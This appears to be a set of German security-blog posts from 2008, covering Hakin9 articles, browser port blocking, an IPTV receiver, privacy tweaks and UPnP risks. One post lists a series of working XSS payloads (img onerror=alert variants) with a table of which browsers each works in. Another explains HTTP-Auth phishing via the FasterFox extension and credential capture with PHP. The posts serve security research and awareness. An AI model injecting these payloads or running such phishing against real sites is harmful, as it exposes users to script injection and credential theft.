Alex' blog (Artikel mit Tag hacking)

25C3

nospam@example.com (Alex) — Fri, 02 Jan 2009 02:36:26 +0100

Der 25. Chaos Communication Congress ist vorbei und es hat sich definitiv gelohnt dabei zu sein.

Weitere Infos zum Congress (Streams, Slides, etc.) gibt es hier.

Neue Hakin9-Ausgabe: Nr. 35 / 05-2008

nospam@example.com (Alex) — Fri, 22 Aug 2008 22:13:43 +0200

Ich bin mal wieder in der neusten Ausgabe als Autor vertreten. Dieses Mal mit dem kurzen Tool-Artikel "Dnsmap", welcher schon in der vorletzten Ausgabe für die letzte Ausgabe angekündigt war. An mir liegt diese Verspätung allerdings nicht !
Der in der letzten Ausgabe versprochene Tool-Artikel zu "Verinice", einem ISMS-Tool, fehlt. Dies liegt aber auch nicht an mir. Vermutlich kommt dieser Artikel in der nächsten Ausgabe Anfang November.

Die neue Ausgabe beinhaltet noch folgende weitere Artikel:

Angriffserkennung über Benutzerverhalten
Schwachstellen in Webanwendungen
Apache Basisschutz
IPv6 Superworm aka Teredo
Sprachstörungen - Netzwerke unter Beschuss
E-Mail-Sicherheit
Advanced Encryption Standard AES
Weiterbildung mittels Security-Zertifizierungen
Evolution der IT-Sicherheit
EVB-IT
Wenn der Kunde zum König wird

Beim Durchblättern ist mir bereits aufgefallen, dass Yannick von Arx, der Autor des Artikels "Weiterbildung mittels Security-Zertifizierungen", überhaupt nicht auf Zertifizierungen zum Auditor nach ISO 27001 respektive BSI-Grundschutz eingeht.
Eigentlich schade darum, aber Zertifizierungen dieser Art sind eher weniger etwas für einen selbst. Vielleicht ist das der Grund, weshalb er diese in seinem Artikel vernachlässigt hat.

Interprotocol Communication/Exploitation - Ein Webbrowser-Vergleich

nospam@example.com (Alex) — Sat, 16 Aug 2008 18:23:17 +0200

Vor ca. 2,5 Wochen hatte ich schon einmal etwas zu Interprotocol Communication/Exploitation geschrieben.

In der Zwischenzeit habe ich einige Webbrowser miteinander verglichen und bin zu folgendem Ergebnis gekommen, welches in der nächsten Zeit sicherlich noch etwas weiter ausgebaut wird.

Interprotocol Communication/Exploitation

nospam@example.com (Alex) — Thu, 31 Jul 2008 19:40:00 +0200

Es ist hinlänglich bekannt, dass Mozilla Port-Blocking für bestimmte Ports vornimmt, damit Interprotocol Communication/Exploitation verhindert wird.

So kann z.B. der beliebte Webbrowser Firefox auf die Ports 20, 21, 22, 23, 25, 110, 111, 113, und viele weitere nicht mittels HTTP zugreifen.

Die vollständige Liste der gesperrten Ports befindet sich hier: http://www.mozilla.org/projects/netlib/PortBanning.html

Heute wollte ich sehen, ob Microsofts Internet Explorer 7 (genauer: 7.0.5730.11) auch über gesperrte Ports verfügt und habe das kurzer Hand schnell getestet: ja, er verfügt über einige wenige Port-Blockaden. Diese lauten wie folgt (ohne Anspruch auf Vollständigkeit):

Doch wie gestalten sich solche Blockaden in anderen Webbrowsern ? Falls jemand Lust und Zeit hat, kann er oder sie gerne hergehen und dies einmal überprüfen. Über eine Rückmeldung würde ich mich freuen, da ich dann selber weniger Arbeit habe und die Ergebnisse gerne in einer Tabelle festhalten würde.

Neue Hakin9-Ausgabe: Nr. 34 / 04-2008

nospam@example.com (Alex) — Sat, 21 Jun 2008 16:23:00 +0200

Es ist mal wieder soweit: eine neue Ausgabe der Fachzeitschrift Hakin9 ist verfügbar. Im Moment allerdings nur für Abonnenten. Die Ausgabe am Kiosk kommt gegen Monatsende.

Ich bin (mal wieder) mit zwei Artikeln darin vertreten. Ein Artikel zu "Anti DNS-Pinning" und ein Tool-Artikel über "TrueCrypt".

Zu dem TrueCrypt-Tool-Artikel muss ich bereits jetzt schon etwas loswerden: er ist nicht mehr ganz aktuell.
Mein Artikel stammt noch aus der Zeit als Version 5.0 noch aktuell war. Mit dem Erscheinen von Version 5.1a haben sich ja noch ein paar Dinge (z.B. Hibernation Mode) geändert.
Das dieser Tool-Artikel erst so spät herauskommt, liegt aber nicht an mir. Wer sich über TrueCrypt und den Veränderungen von 5.0 zu 5.1a bei mir noch informieren möchte, dem lege ich folgenden Link ans Herz: http://www.bitsploit.de/plugin/tag/truecrypt

Die neue Ausgabe beinhaltet noch folgende weitere Artikel:

Kryptoanalyse mit C
Breaking Enterprise Security
Address Space Layout Randomization
ISO 27001
Unternehmen schützen mit IT-Grundschutz
IT-Sicherheit ritualisieren
Eine sichere PHP-Umgebung schaffen
Datenschutz - Chance statt Blockade
Löschen von Festplatten
Interview mit Professor Hartmut Pohl
Feuilleton "Digitale Hausdurchsuchung 2008"

(In der Ausgabe 35 werden auch wieder zwei Artikel von mir mit am Start sein: ein Tool-Artikel zum Programm "Dnsmap" und ein Artikel zu "HTTP Response Splitting".)

Entertain Comfort - es läuft

nospam@example.com (Alex) — Fri, 23 May 2008 03:08:16 +0200

Damit hat die Story vorläufig endlich ein Ende. Jetzt haben wir nur noch den falschen Entertain-Tarif.

Da die Hardware bis Mittwoch nicht per Post geliefert wurde und ich nochmals ein paar Telefongespräche mit vielen verschiedenen Leuten bzgl. dieser Geschichte geführt habe, habe ich dann Mittwoch aus dem T-Shop ein komplettes Hardware-Paket mitgenommen.

An dieser Stelle möchte ich mal den Mitarbeiter aus dem T-Shop in Mannheim (in O 2), welcher mein Blog liest, grüßen.

Irgendwann Mittwoch spät abends habe ich dann mal Zeit gefunden und den Media Receiver ausprobiert. Eigentlich läuft alles soweit ganz rund. Einen kompletten IPTV-Ausfall habe ich allerdings auch schon hinter mir - mitten im Film. Ist allerdings ein PPPoE-Fehler gewesen und somit hat alles andere auch nicht mehr funktioniert. War daher also nicht die Schuld des X 301 T. Eine neue T-Online PIN habe ich mir mit dem Receiver online direkt eingerichtet. (Das geht auch unter tfs.t-online.de, dann sollte man allerdings einen nicht zu sehr auf Sicherheit getrimmten Internet Explorer benutzen.)

Nachdem ich am gestrigen Feiertag etwas mehr Zeit hatte, um mir den Receiver anzuschauen, hier mal ein paar Dinge, die mir aufgefallen sind (Firmware ist aktuell):

Die verbaute 160 GB HDD ist leise, aber dennoch hörbar. Fällt aber nicht unbedingt auf, wenn der TV läuft.
Das man nur Aufnahmen machen kann, wenn das Gerät im Stand-by Modus ist, ist falsch.
Das kleine Kabel zum Verkabeln der zwei DVB-T Tuner kann man sich sparen, da die niemals von offizieller Seite her aktiviert werden.
Die Menübedienung ist etwas umständlich: man kann nicht direkt vom ersten zum letzten Eintrag in einem Menüpunkt springen.
Die USB-Anschlüssen, wovon man sowieso nur einen zum gleichen Zeitpunkt verwenden kann, sind auch mit der aktuellen Firmware-Version noch nicht funktionsfähig.
Die Hilfe-Texte im Menü sind veraltet und teilweise falsch sortiert.
Die Übersicht über die Festplatten-Belegung ist zu versteckt. So eine Funktion braucht man doch häufiger. Bei mir funktioniert sie allerdings auch nicht. Ich glaube nämlich nicht, dass ein ca. zwei Stunden langer James Bond Film in weniger als 8 MB passt ...
Die Fernbedienung ist ziemlich schwer.
Digitaler Radio-Empfang über Internet ist bislang nicht möglich, aber wohl in Planung.
Festplatten-Aufnahmen von Video-On-Demand (VOD) Sendungen ist nicht möglich.
Das Gerät reagiert minimal zu langsam auf Tastendrücke.
Die oft kritisierte Umschaltgeschwindigkeit von Fernsehsendern finde ich jetzt nicht unbedingt erwähnenswert.
Eine Vorlaufzeit für eine Aufnahme kann man nicht einstellen. (Eine Nachlaufzeit sehr wohl.) Hierfür muss man bislang alle Sendungen per Hand programmieren.
Die Standard-Einstellungen (Nachlaufzeit, etc.) für eine Aufnahme lassen sich nicht generell verändert abspeichern. Wenn man z.B. stets 10 Minuten Nachlauf haben möchte, so muss man das immer von Hand bei jeder Aufnahme abändern.
Wenn man eine Aufnahme anschaut und diese dann anhält, anschließend ins Menü geht, um diese Aufnahme zu löschen, so bleibt man nach dem Löschen im gleichen Menü hängen. Man könnte also nochmal auf Abspielen, Löschen, etc. drücken.
Mit einer 16 Mbit/s DSL-Leitung kann man maximal zwei Standard-TV (SD) Sendungen gleichzeitig aufnehmen. Eine weitere kann man dann nicht mehr über den Media Receiver anschauen.

Einen Qualitätsvergleich zwischen DVB-C und IPTV habe ich bislang noch nicht gemacht. Ist mir aber eigentlich auch egal, solange es nicht wahnsinnige Ausreißer hat. DVB-S ist wahrscheinlich immer besser (sofern das Wetter mitspielt). Zu HDTV kann ich auch nichts sagen, da ich weder ein passendes TV-Gerät noch VDSL gebucht habe.

Fernsehen direkt anhalten zu können ist schon ziemlich cool. Das Vorspulen bei Werbung auch. Das geht natürlich nur, wenn man später mit dem Anschauen einer Sendung begonnen hat, aber trotzdem von Anfang an dabei war. Wenn man während einer Sendung die ganze Zeit dabei war und sich erst kurz vor Schluss dazu entscheidet, dass man die Sendung doch gerne archivieren würde, so kann man dies auch tun - und zwar vom Beginn der Sendung an. Das ist schon ziemlich cool !
(Einiges lässt sich natürlich auch mit einem reinen Festplatten-Rekorder erledigen und setzt nicht zwingend IPTV voraus.)

Da man momentan seine Aufnahmen nicht extern sichern kann und da dies auch für gekaufte Filme aus dem VOD-Portal gilt, ist es natürlich schon verlockend, wenn man einen Weg finden könnte, um diese Restriktionen zu umgehen. Analoge/digitale Kopien von jeder Aufnahme zu erstellen ist kein wünschenswerter Ersatz. Auch das Aus- und Wiedereinbauen der Festplatte zum Image sichern, ist ebenfalls sehr unpraktikabel.

Da es schon ein paar Leute gibt, die sich bislang noch recht erfolglos an die Arbeit gemacht haben, um diese Beschränkungen zu umgehen, werde ich auch mal meinen Kopf anstrengen. Allerdings werde ich dazu einen anderen Weg einschlagen. Das Öffnen der Box sollte nicht notwendig sein. (Außerdem fehlt mir dazu der passende Schraubendreher.)

Update: Mir ist jetzt schon öfters aufgefallen, dass Filme ab und zu kurz mal stehen bleiben für ein bis zwei Sekunden. Das ist weniger schön.

Neues Layout beim Hakin9 Magazin

nospam@example.com (Alex) — Sun, 27 Apr 2008 17:00:26 +0200

Seit gestern bin ich wieder im Besitz der neuesten Ausgabe des Hakin9 Magazins. Sofort fällt das neue Layout auf. Gefällt mir wesentlich besser als das alte.

Zudem bin ich mal wieder darin vertreten - dieses Mal allerdings nur mit einem Tool-Artikel.
(Für das falsche Bild bin ich allerdings nicht verantwortlich !)

Bis zum Jahresende dürfte ich eigentlich in jeder Ausgabe vertreten sein (normale Artikel und Tool-Artikel).

Der Versand der neuen Ausgaben hat sich seit den letzten Monaten nicht mehr verändert: er ist stets sehr pünktlich. Das war ein Punkt, den ich früher bemängeln musste.

Lokale IP-Adresse im E-Mail Header von Mozilla Thunderbird entfernen

nospam@example.com (Alex) — Thu, 21 Feb 2008 22:23:00 +0100

Wenn Mozilla Thunderbird keinen FQDN des verwendeten PCs feststellen kann, so wird hierfür die IP-Adresse der ans WAN angebundenen NIC verwendet. Diese Adresse erscheint dann im Header einer jeden E-Mail.
Wenn man nun hinter einem Router mit NAT sitzt, so wird die lokale IP-Adresse der Außenwelt verraten.
Mit dieser Kenntnis lassen sich gezieltere Angriffe auf ein Intranet durchführen.

Damit man diese Unart von Thunderbird abstellen kann, bedarf es nur eines neuen Eintrages in der Konfiguration, welche man unter "Konfiguration bearbeiten..." (für Kenner: about:config) über "Extras" => "Einstellungen" => "Erweitert" => "Allgemein" erreichen kann.

Hier legt man einen neuen String mit dem Namen "mail.smtpserver.default.hello_argument" an. Der Wert des Strings kann dann eine (quasi) beliebige IP-Adresse sein. Ich bevorzuge hier die IP-Adresse 127.0.0.1, da sie eigentlich von allen Mail-Servern als gültig angesehen werden dürfte. Da 127.0.0.1 die IP-Adresse des lokalen Loopback-Interfaces ist, verrät man hiermit definitiv kein Geheimnis.

Hersteller hinter MAC-Adresse herausfinden

nospam@example.com (Alex) — Sat, 26 Jan 2008 00:35:16 +0100

Manchmal kann es notwendig sein, dass man den Hersteller eines Produktes mit MAC-Adresse identifizieren muss.

Meistens ist das eine relativ einfache Sache, denn MAC-Adresse sind (quasi) einmalig auf der Welt und werden an Hersteller vergeben. Die hierfür zuständige Stelle ist die IEEE.

Die ersten drei Byte einer MAC-Adresse bilden hierbei die Herstellerkennung, die auch OUI (Organizationally Unique Identifier) genannt wird. Allerdings gibt es, wie meistens im Leben, auch einige Ausnahmen, die man zum Beispiel bei Wikipedia einsehen kann.

Wer die ersten drei Byte hat, kann hier den Hersteller nachschlagen.

Wie man es nicht machen sollte - revisited

nospam@example.com (Alex) — Wed, 16 Jan 2008 16:33:00 +0100

Nach mehr als einem Monat Zeit funktioniert dies hier noch immer. Dabei bräuchte es nicht einmal fünf Minuten, um es in Ordnung zu bringen.
Und ja, es wurde dem Mobilfunk-Provider gemeldet (mit Rückantwort).

Was kommt nach JavaScript & Flash ? UPnP !

nospam@example.com (Alex) — Tue, 15 Jan 2008 14:42:00 +0100

Seit heute ist es auch beim Verlag Heise zu lesen: Ungewollte Fernkonfiguration für Heim-Router.

Das UPnP schon immer gefährlich war, ist nichts neues. Eigentlich wird UPnP hauptsächlich für das Setzen von Port-Forwardings im Router, initiert durch Anwendungen im LAN, benutzt. Daher war Universal PnP auch schon immer so gefährlich, da sich bereits im LAN befindliche Malware ebenfalls UPnP bedienen kann, um Port-Forwardings im Router einzurichten. Somit wäre es dann möglich auf Dienste, die sonst vom WAN aus nicht erreichbar wären, problemlos zugreifen zu können.

Doch nun kommt das Ganze etwas ~~anders~~ schlimmer: Während man früher noch CSRF/XSRF-Attacken in Verbindung mit einem bereits in den Router eingeloggten Benutzer brauchte, um z.B. den vom Provider zugeteilten DNS-Server zu verändern, um (z.B.) gepflegter Phishing betreiben zu können, ist dies jetzt nicht mehr notwendig, da UPnP über keinerlei Authentifizierungsmassnahmen verfügt und leider zu wesentlich mehr fähig ist als nur Port-Forwardings setzen zu können, was ich leider auch erst lernen musste. Wikipedia ist hier leider nicht vollständig.

Bislang konnte sich Malware im LAN ebenfalls dieser "erweiterten" Features von UPnP bedienen, aber dank der Arbeit von pdp und ap braucht es jetzt quasi nicht mehr als einen Webbrowser und eine entsprechend präparierte Webseite für einen solchen Angriff von außen.

Daher macht man es mir am besten nach. UPnP komplett deaktivieren - und nicht nur im Router, sondern auch am besten in allen anderen UPnP-fähigen Geräte, sofern weitere vorhanden sind. (Unser Router hat direkt an seinem ersten Arbeitstag UPnP deaktiviert bekommen.)

Weil die beiden bereits genug ausführliche Artikel zu dem Thema geschrieben haben, verweise ich hier auf die entsprechenden Seiten:

Neuer XSS-Angriffsvektor

nospam@example.com (Alex) — Sat, 05 Jan 2008 19:49:22 +0100

Nicht wirklich neu, aber er fehlt noch in RSnakes XSS Cheat Sheet:

<img src=. onerror=alert('XSS')>

Getestet in Firefox 2.0.0.11, Opera 9.25, Internet Explorer 7 und Safari 3.04 Beta (Windows).

Allerdings gibt es noch einige andere Varianten, die wie folgt funktionieren:

0<img src=\ onerror=alert(0)>FF2: 0 / IE7: 1 / O: 1 / S: 1 1<img src="/" onerror=alert(1)>FF2: 0 / IE7: 1 / O: 1 / S: 1 2<img src="." onerror=alert(2)>FF2: 1 / IE7: 1 / O: 1 / S: 1 3<img src="" onerror=alert(3)>FF2: 1 / IE7: 1 / O: 0 / S: 0 4<img src=. onerror=alert(4)>FF2: 1 / IE7: 1 / O: 1 / S: 1 5<img src=/ onerror=alert(5)>FF2: 0 / IE7: 1 / O: 1 / S: 1 6<img src= onerror=alert(6)>FF2: 0 / IE7: 0 / O: 0 / S: 0 7<img src onerror=alert(7)>FF2: 1 / IE7: 0 / O: 0 / S: 0 8<img onerror=alert(8)>FF2: 0 / IE7: 0 / O: 0 / S: 0 9<img src="\" onerror=alert(9)>FF2: 0 / IE7: 1 / O: 1 / S: 1(0 = funktioniert nicht; 1 = funktioniert)

Cross Domain Basic Auth Phishing Tactics 3.0

nospam@example.com (Alex) — Thu, 03 Jan 2008 15:25:00 +0100

Heute häuft es sich ja richtig mit den Einträgen zur Unsicherheit von Webbrowsern ...

Das nächste, was ich entdeckt habe, ist, dass Firefox-Benutzer, die die Extension "FasterFox" installiert haben, um sich mittels Prefetching von statischen Webseiten einen Geschwindigkeitsvorteil zu sichern, leichter bei XSA-Angriffen über das Ohr gehauen werden können, als Firefox-Benutzer, die auf "FasterFox" verzichten.

Um in beispielsweise einem Forum jemanden mittels Phishing über das Ohr zu hauen, verwendet man sonst üblicherweise HTML oder BBCode, um ein (nicht existentes) Bild in den eigenen Beitrag einzubinden. Das Verzeichnis, wo das (nicht existente) Bild liegt, wird zudem mit HTTP-Auth abgesichert.

Falls nun in einem Forum zur Absicherung HTML-Quellcode bzw. BBCode zur Einbettung von Grafiken deaktiviert wurde, ist dieser Angriff nicht möglich. Wer jedoch die Extension "FasterFox" installiert hat, der kann hier dennoch Opfer eines Phishing-Angriffs werden.

Wenn der Angreifer in dem Forum Links direkt eingeben kann (z.B. über BBCode) oder reiner Text auf gültige URLs automatisch geparst wird, der bekommt diese Links dank besagter Extension im Voraus geladen. Die Folge davon ist, dass sich nur beim Besuch einer solchen Webseite mit einem Link auf einen Bereich, geschützt durch HTTP-Auth, im Firefox der übliche HTTP-Auth Dialog erscheint und um Eingabe der Logindaten bittet.

Wer dies mit installierter "FasterFox"-Extension ausprobieren möchte, der klickt bitte einmal hier: http://ha.ckers.org/blog/20070608/cross-domain-basic-auth-phishing-tactics/
(Dies funktioniert ebenfalls nur für kurze Zeit, da ich bald die .htaccess-Datei von testing.bitsploit.de wieder entfernen werde.)

Update: RSnake fand es auch eine Erwähnung wert.

XSA-Artikel in Hakin9

nospam@example.com (Alex) — Thu, 03 Jan 2008 14:28:00 +0100

Ich hatte für die Ausgabe 10/2007 des Magazins Hakin9 einen Artikel über Cross-Site Authentication (XSA) Angriffe verfasst. Da ich heute mal wieder etwas mit HTTP-Auth zu tun hatte und ich damals über den Angriff mittels eines Perl-Moduls (für Apache) geschrieben habe, möchte ich hier nun noch eine Ergänzung vornehmen:

Wer statt Perl lieber PHP benutzen möchte, der kann sich der zwei Variablen $_SERVER['PHP_AUTH_USER'] und $_SERVER['PHP_AUTH_PW'] bedienen. Auf diese Art und Weise braucht man weder mod_perl noch das vorgestellte Perl-Modul selbst. So muss nach der beschriebenen XAMPP-Installation das Perl-Installationspaket nicht mehr installiert werden.